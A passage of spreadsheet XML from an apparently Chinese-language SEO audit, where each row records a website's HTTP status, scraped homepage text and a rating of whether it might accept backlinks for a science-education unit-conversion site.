        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q247" s="21" t="str">
        <x:v>あなたのエリアの地元のジム/スポーツ施設を見つける。 LocalGymsAndFitness ホーム 市 国 ログイン 地元のジム/スポーツ施設を見つける HGC GOLF Hatsudai 本町2-6-3 初台本町ビル1F Shibuya-ku, 151-0071 Casa de samba Tóquio 〜Lesson &amp; Event〜 東京都渋谷区本町１丁目５６ Shibuya-ku, 151-0071 悩み解決！ダンスで人生、ハッピーに！ ダイビングスクールルアナ 東京都渋谷区本町4-41-13ヴィラオグニ1F Shibuya-ku, 151-0071 東京都西新宿にあるダイビングスクールです♪女性オーナーが丁寧に指導♪ クリビアバレエランド 本町2-5-1 スクエア初台２F Shibuya-ku, 151-0071 おとなも、こどもも、みんなが楽しんでバレエができる場所です。 大人バレエアカデミー 渋谷区本町1－12－7 Shibuya-ku, 1510053 趣味でバレエを頑張る人を応援したい、が理念です。大人専門の基礎しかやらないスタジオです。西新宿、銀座、池袋、横浜、芝、浜松町、錦糸町、大阪梅田にスタジオがあります。 https://personalballet.com/academy/ Smile Flower 親子ビクス、ママビクス、キッズビクス 東京都渋谷区 Shibuya-ku, 151-0071 Smile Flower〜笑顔の花を咲かせよう〜 子どもの笑顔はママの活力に… ママ? パーソナルトレーニングswitch 本町1丁目17-11 STCビル3F. 4F Shibuya-ku, 151-0071 </x:v>
      </x:c>
      <x:c r="R247" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S247" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T247" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://localgymsandfitness.com</x:v>
      </x:c>
    </x:row>
    <x:row r="248">
      <x:c r="A248" s="18" t="str">
        <x:v>247</x:v>
      </x:c>
      <x:c r="B248" s="19" t="str">
        <x:v>taminglittlemonsters.com</x:v>
      </x:c>
      <x:c r="C248" s="19" t="str">
        <x:v>https://taminglittlemonsters.com</x:v>
      </x:c>
      <x:c r="D248" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E248" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F248" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G248" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H248" s="19" t="str">
        <x:v>https://taminglittlemonsters.com/</x:v>
      </x:c>
      <x:c r="I248" s="19" t="str">
        <x:v>Taming Little Monsters Educational Crafts and Activities for Kids - Taming Little Monsters</x:v>
      </x:c>
      <x:c r="J248" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K248" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L248" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M248" s="19" t="str">
        <x:v>https://taminglittlemonsters.com/</x:v>
      </x:c>
      <x:c r="N248" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O248" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P248" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q248" s="21" t="str">
        <x:v>Taming Little Monsters is all about fun, easy and educational activities for kids aged 0 - 6. If you're looking for play ideas or classroom activities, we've got you covered. Taming Little Monsters Educational Crafts and Activities for Kids - Taming Little Monsters Skip to content Home About Contact Activities Coloring Pages Arts and Crafts Process Art Ideas Paper Plate Crafts Popsicle Stick Crafts STEM Free Printables Math and Literacy Sensory Taste-Safe Ideas Fine Motor Seasons Valentine’s Day Valentine’s Crafts Valentine’s STEM Valentine’s Sensory Valentine’s Fine Motor Valentine’s Printables Spring Spring Crafts Spring STEM Spring Sensory Spring Fine Motor Spring Printables Easter Easter Crafts Easter STEM Easter Sensory Easter Fine Motor Easter Printables Summer Summer Crafts Summer STEM Summer Sensory Summer Fine Motor Summer Printables Fall / Autumn Fall C</x:v>
      </x:c>
      <x:c r="R248" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S248" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T248" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://taminglittlemonsters.com</x:v>
      </x:c>
    </x:row>
    <x:row r="249">
      <x:c r="A249" s="18" t="str">
        <x:v>248</x:v>
      </x:c>
      <x:c r="B249" s="19" t="str">
        <x:v>archfoundation.org</x:v>
      </x:c>
      <x:c r="C249" s="19" t="str">
        <x:v>https://archfoundation.org</x:v>
      </x:c>
      <x:c r="D249" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E249" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F249" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G249" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H249" s="19" t="str">
        <x:v>https://www.archfoundation.org/</x:v>
      </x:c>
      <x:c r="I249" s="19" t="str">
        <x:v>Architectural Foundation - Best Home Design Ideas</x:v>
      </x:c>
      <x:c r="J249" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K249" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L249" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M249" s="19" t="str">
        <x:v>https://www.archfoundation.org/</x:v>
      </x:c>
      <x:c r="N249" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O249" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P249" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q249" s="21" t="str">
        <x:v>Architectural Foundation - Best Home Design Ideas Skip to content Home Architecture Bathroom Bathroom Ideas Bathtubs Showers Toilets Kitchen Kitchen Ideas Living Room Bedroom Tools Blog Architectural Foundation Bathroom Ideas 50+ Simple and Romantic Bedroom Ideas 20+ Pool Bathroom Ideas 22+ Cabin Bathroom Ideas 43+ Victorian Bathroom Ideas 25+ Blue and Gray Bathroom Ideas 26+ Zen Bathroom Ideas 37+ Purple Bathroom Ideas 12+ Bathroom Baseboard Ideas Bedroom Ideas 45+ Gorgeous Red Bedroom Ideas 57 Most Gorgeous Bedroom Sitting Area Ideas 45+ Western Bedroom Ideas 53+ Black Bedroom Ideas 50+ Best Bedroom Office Ideas 30+ Rose Gold Bedroom Ideas 16+ Sunflower Bedroom Ideas 17+ Most Mystical Unic</x:v>
      </x:c>
      <x:c r="R249" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S249" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T249" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://archfoundation.org</x:v>
      </x:c>
    </x:row>
    <x:row r="250">
      <x:c r="A250" s="18" t="str">
        <x:v>249</x:v>
      </x:c>
      <x:c r="B250" s="19" t="str">
        <x:v>freckledfrog.com.au</x:v>
      </x:c>
      <x:c r="C250" s="19" t="str">
        <x:v>https://freckledfrog.com.au</x:v>
      </x:c>
      <x:c r="D250" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E250" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F250" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G250" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H250" s="19" t="str">
        <x:v>https://www.freckledfrog.com.au/</x:v>
      </x:c>
      <x:c r="I250" s="19" t="str">
        <x:v>Buy Educational Toys Online for Toddlers, Australia- Online Toys Store for Kids - Freckled Frog</x:v>
      </x:c>
      <x:c r="J250" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K250" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L250" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M250" s="19" t="str">
        <x:v>https://www.freckledfrog.com.au/</x:v>
      </x:c>
      <x:c r="N250" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O250" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P250" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q250" s="21" t="str">
        <x:v>The Freckled Frog offers a wide range of fun educational wooden toys for kids and toddlers. Check out our range today! Buy Educational Toys Online for Toddlers, Australia- Online Toys Store for Kids - Freckled Frog ASIA PROMO SHIPPING Contact Us Login / Register 0 Shop Construction Gifts under $30 Imaginative Play Skills Development Puzzles Sale About Us Become a Wholesaler Blog Bundle &amp; Save Login / Register 0 $12.95 Australia flat rate shipping* Eco-friendly wooden toys Trusted by educators around the world Australia owned Afterpay available $12.95* AUSTRALIA WIDE DELIVERY *excludes bulky items Menu Home My Account Shop Construction Gifts under $30 Imaginative Play Skills Development Puzzles How to Play with the “Whizzy Dizzy” Dancing Feet Wishlist About Us Catalogue Blog Contact Become a Wholesaler Mini C</x:v>
      </x:c>
      <x:c r="R250" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S250" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T250" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://freckledfrog.com.au</x:v>
      </x:c>
    </x:row>
    <x:row r="251">
      <x:c r="A251" s="18" t="str">
        <x:v>250</x:v>
      </x:c>
      <x:c r="B251" s="19" t="str">
        <x:v>weekendnotes.com</x:v>
      </x:c>
      <x:c r="C251" s="19" t="str">
        <x:v>https://weekendnotes.com</x:v>
      </x:c>
      <x:c r="D251" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E251" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F251" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G251" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H251" s="19" t="str">
        <x:v>https://weekendnotes.com/</x:v>
      </x:c>
      <x:c r="I251" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J251" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K251" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L251" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M251" s="19" t="str">
        <x:v>https://weekendnotes.com/</x:v>
      </x:c>
      <x:c r="N251" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O251" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P251" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q251" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access weekendnotes.com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a349b992e9a0e005 &amp;bull; Your IP: Clic</x:v>
      </x:c>
      <x:c r="R251" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S251" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T251" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://weekendnotes.com</x:v>
      </x:c>
    </x:row>
    <x:row r="252">
      <x:c r="A252" s="18" t="str">
        <x:v>251</x:v>
      </x:c>
      <x:c r="B252" s="19" t="str">
        <x:v>decorfrost.com</x:v>
      </x:c>
      <x:c r="C252" s="19" t="str">
        <x:v>https://decorfrost.com</x:v>
      </x:c>
      <x:c r="D252" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E252" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F252" s="20"/>
      <x:c r="G252" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H252" s="19" t="str"/>
      <x:c r="I252" s="19" t="str"/>
      <x:c r="J252" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K252" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L252" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M252" s="19" t="str">
        <x:v>https://decorfrost.com</x:v>
      </x:c>
      <x:c r="N252" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O252" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P252" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q252" s="21" t="str"/>
      <x:c r="R252" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S252" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T252" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://decorfrost.com
http://decorfrost.com</x:v>
      </x:c>
    </x:row>
    <x:row r="253">
      <x:c r="A253" s="18" t="str">
        <x:v>252</x:v>
      </x:c>
      <x:c r="B253" s="19" t="str">
        <x:v>toptravelescapes.com</x:v>
      </x:c>
      <x:c r="C253" s="19" t="str">
        <x:v>https://toptravelescapes.com</x:v>
      </x:c>
      <x:c r="D253" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E253" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F253" s="20" t="str">
        <x:v>401</x:v>
      </x:c>
      <x:c r="G253" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H253" s="19" t="str">
        <x:v>https://toptravelescapes.com/</x:v>
      </x:c>
      <x:c r="I253" s="19" t="str">
        <x:v>401 Unauthorized</x:v>
      </x:c>
      <x:c r="J253" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K253" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L253" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M253" s="19" t="str">
        <x:v>https://toptravelescapes.com/</x:v>
      </x:c>
      <x:c r="N253" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O253" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P253" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q253" s="21" t="str">
        <x:v>401 Unauthorized Unauthorized This server could not verify that you are authorized to access the document requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required. Apache Server at toptravelescapes.com Port 443</x:v>
      </x:c>
      <x:c r="R253" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S253" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T253" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://toptravelescapes.com</x:v>
      </x:c>
    </x:row>
    <x:row r="254">
      <x:c r="A254" s="18" t="str">
        <x:v>253</x:v>
      </x:c>
      <x:c r="B254" s="19" t="str">
        <x:v>cloudns.ph</x:v>
      </x:c>
      <x:c r="C254" s="19" t="str">
        <x:v>https://cloudns.ph</x:v>
      </x:c>
      <x:c r="D254" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E254" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F254" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G254" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H254" s="19" t="str">
        <x:v>http://cloudns.ph/</x:v>
      </x:c>
      <x:c r="I254" s="19" t="str">
        <x:v>cloudns.ph</x:v>
      </x:c>
      <x:c r="J254" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K254" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L254" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M254" s="19" t="str">
        <x:v>http://cloudns.ph/</x:v>
      </x:c>
      <x:c r="N254" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O254" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P254" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q254" s="21" t="str">
        <x:v>cloudns.ph cloudns.ph This domain is registered for one of our customers. If this is your domain name, please visit this page to see how to register it as DNS zone into your account. Note: If you already have registered the DNS zone for your domain name, please wait for DNS propagation. Your web site will be displayed soon. It may take few minutes. About ClouDNS DNS Services Free DNS hosting Dynamic DNS Managed DNS Anycast DNS Reverse DNS Secondary DNS Enterprise DNS Парко́вка доме́нов Services Premium DNS DDoS Protected DNS GeoDNS Private DNS servers Domain names Email forwarding Google Workspace SSL certificates DDoS Protected VPS Monitoring Service &amp;copy; ClouDNS Wiki Blog</x:v>
      </x:c>
      <x:c r="R254" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S254" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T254" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://cloudns.ph
http://cloudns.ph</x:v>
      </x:c>
    </x:row>
    <x:row r="255">
      <x:c r="A255" s="18" t="str">
        <x:v>254</x:v>
      </x:c>
      <x:c r="B255" s="19" t="str">
        <x:v>lopezdiez.store</x:v>
      </x:c>
      <x:c r="C255" s="19" t="str">
        <x:v>https://lopezdiez.store</x:v>
      </x:c>
      <x:c r="D255" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E255" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F255" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G255" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H255" s="19" t="str">
        <x:v>https://lopezdiez.store/</x:v>
      </x:c>
      <x:c r="I255" s="19" t="str">
        <x:v>Lopez Diez – S.R.L</x:v>
      </x:c>
      <x:c r="J255" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K255" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L255" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M255" s="19" t="str">
        <x:v>https://lopezdiez.store/</x:v>
      </x:c>
      <x:c r="N255" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O255" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P255" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q255" s="21" t="str">
        <x:v>Lopez Diez – S.R.L Saltar al contenido Enrique Santamarina 787 Monte Grande | Envíos a todo el país Enrique Santamarina 787 Monte Grande | Envíos a todo el país Shop Cocina Anafes Cocinas Campanas isla Campanas pared Hornos Microondas Parrillas Ventilación Extractores de aire Hogar Secarropas ★ Destacados ★Anafes ★Campanas ★Hornos y Cocinas ★Forzadores de Aire Buscar por: $ 0.00 No hay productos en el carrito. Volver a la tienda Carrito No hay productos en el carrito. Volver a la tienda PREMIUM CUERO Ver productos ZAPATILLAS ZAPATOS CAMPANAS PARA COCINA Conocé nuestra amplia colección de diseños innovadores VER PRODUCTOS ANAFES VITROCERÁMICOS Disfrutá cocinando con tecnología de vanguardia. </x:v>
      </x:c>
      <x:c r="R255" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S255" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T255" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://lopezdiez.store</x:v>
      </x:c>
    </x:row>
    <x:row r="256">
      <x:c r="A256" s="18" t="str">
        <x:v>255</x:v>
      </x:c>
      <x:c r="B256" s="19" t="str">
        <x:v>newyorkdigitalnews.org</x:v>
      </x:c>
      <x:c r="C256" s="19" t="str">
        <x:v>https://newyorkdigitalnews.org</x:v>
      </x:c>
      <x:c r="D256" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E256" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F256" s="20"/>
      <x:c r="G256" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H256" s="19" t="str"/>
      <x:c r="I256" s="19" t="str"/>
      <x:c r="J256" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K256" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L256" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M256" s="19" t="str">
        <x:v>https://newyorkdigitalnews.org</x:v>
      </x:c>
      <x:c r="N256" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O256" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P256" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q256" s="21" t="str"/>
      <x:c r="R256" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S256" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T256" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://newyorkdigitalnews.org
http://newyorkdigitalnews.org</x:v>
      </x:c>
    </x:row>
    <x:row r="257">
      <x:c r="A257" s="18" t="str">
        <x:v>256</x:v>
      </x:c>
      <x:c r="B257" s="19" t="str">
        <x:v>letsmama.com</x:v>
      </x:c>
      <x:c r="C257" s="19" t="str">
        <x:v>https://letsmama.com</x:v>
      </x:c>
      <x:c r="D257" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E257" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F257" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G257" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H257" s="19" t="str">
        <x:v>https://www.letsmama.com/</x:v>
      </x:c>
      <x:c r="I257" s="19" t="str">
        <x:v>Home - Letsmama</x:v>
      </x:c>
      <x:c r="J257" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K257" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L257" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M257" s="19" t="str">
        <x:v>https://www.letsmama.com/</x:v>
      </x:c>
      <x:c r="N257" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O257" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P257" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q257" s="21" t="str">
        <x:v>Home - Letsmama Educational Activities Health and Wellness Parenting and Childcare Parties and Celebrations Toys and Products Type to search Educational Activities Health and Wellness Parenting and Childcare Parties and Celebrations Toys and Products Home About Me Contact Us Privacy Policy Activities for Parties Party Planning Discover Budget-Friendly Food Ideas for Birthday Party Amanda Mitchell October 12, 2023 Adults and Kids 75 Fascinating Topics to Spark Curiosity in Adults and Kids Francis Mitchell October 12, 2023 Child Safety A Parent’s Guide: The Use of Corn Starch for Diaper Rash Peter Brown October 12, 2023 Baby Care Can You Take Dayquil While Breastfeeding? Find All the Answers V</x:v>
      </x:c>
      <x:c r="R257" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S257" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T257" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://letsmama.com</x:v>
      </x:c>
    </x:row>
    <x:row r="258">
      <x:c r="A258" s="18" t="str">
        <x:v>257</x:v>
      </x:c>
      <x:c r="B258" s="19" t="str">
        <x:v>twinkl.my</x:v>
      </x:c>
      <x:c r="C258" s="19" t="str">
        <x:v>https://twinkl.my</x:v>
      </x:c>
      <x:c r="D258" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E258" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F258" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G258" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H258" s="19" t="str">
        <x:v>https://www.twinkl.my/</x:v>
      </x:c>
      <x:c r="I258" s="19" t="str"/>
      <x:c r="J258" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K258" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L258" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M258" s="19" t="str">
        <x:v>https://www.twinkl.my/</x:v>
      </x:c>
      <x:c r="N258" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O258" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P258" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q258" s="21" t="str"/>
      <x:c r="R258" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S258" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T258" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.my</x:v>
      </x:c>
    </x:row>
    <x:row r="259">
      <x:c r="A259" s="18" t="str">
        <x:v>258</x:v>
      </x:c>
      <x:c r="B259" s="19" t="str">
        <x:v>notquitemarypoppins.com</x:v>
      </x:c>
      <x:c r="C259" s="19" t="str">
        <x:v>https://notquitemarypoppins.com</x:v>
      </x:c>
      <x:c r="D259" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E259" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F259" s="20"/>
      <x:c r="G259" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H259" s="19" t="str"/>
      <x:c r="I259" s="19" t="str"/>
      <x:c r="J259" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K259" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L259" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M259" s="19" t="str">
        <x:v>https://notquitemarypoppins.com</x:v>
      </x:c>
      <x:c r="N259" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O259" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P259" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q259" s="21" t="str"/>
      <x:c r="R259" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S259" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T259" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://notquitemarypoppins.com
http://notquitemarypoppins.com</x:v>
      </x:c>
    </x:row>
    <x:row r="260">
      <x:c r="A260" s="18" t="str">
        <x:v>259</x:v>
      </x:c>
      <x:c r="B260" s="19" t="str">
        <x:v>harrismithmarathonclub.co.za</x:v>
      </x:c>
      <x:c r="C260" s="19" t="str">
        <x:v>https://harrismithmarathonclub.co.za</x:v>
      </x:c>
      <x:c r="D260" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E260" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F260" s="20" t="str">
        <x:v>500</x:v>
      </x:c>
      <x:c r="G260" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H260" s="19" t="str">
        <x:v>http://harrismithmarathonclub.co.za/</x:v>
      </x:c>
      <x:c r="I260" s="19" t="str">
        <x:v>500 Internal Server Error</x:v>
      </x:c>
      <x:c r="J260" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K260" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L260" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M260" s="19" t="str">
        <x:v>http://harrismithmarathonclub.co.za/</x:v>
      </x:c>
      <x:c r="N260" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O260" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P260" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q260" s="21" t="str">
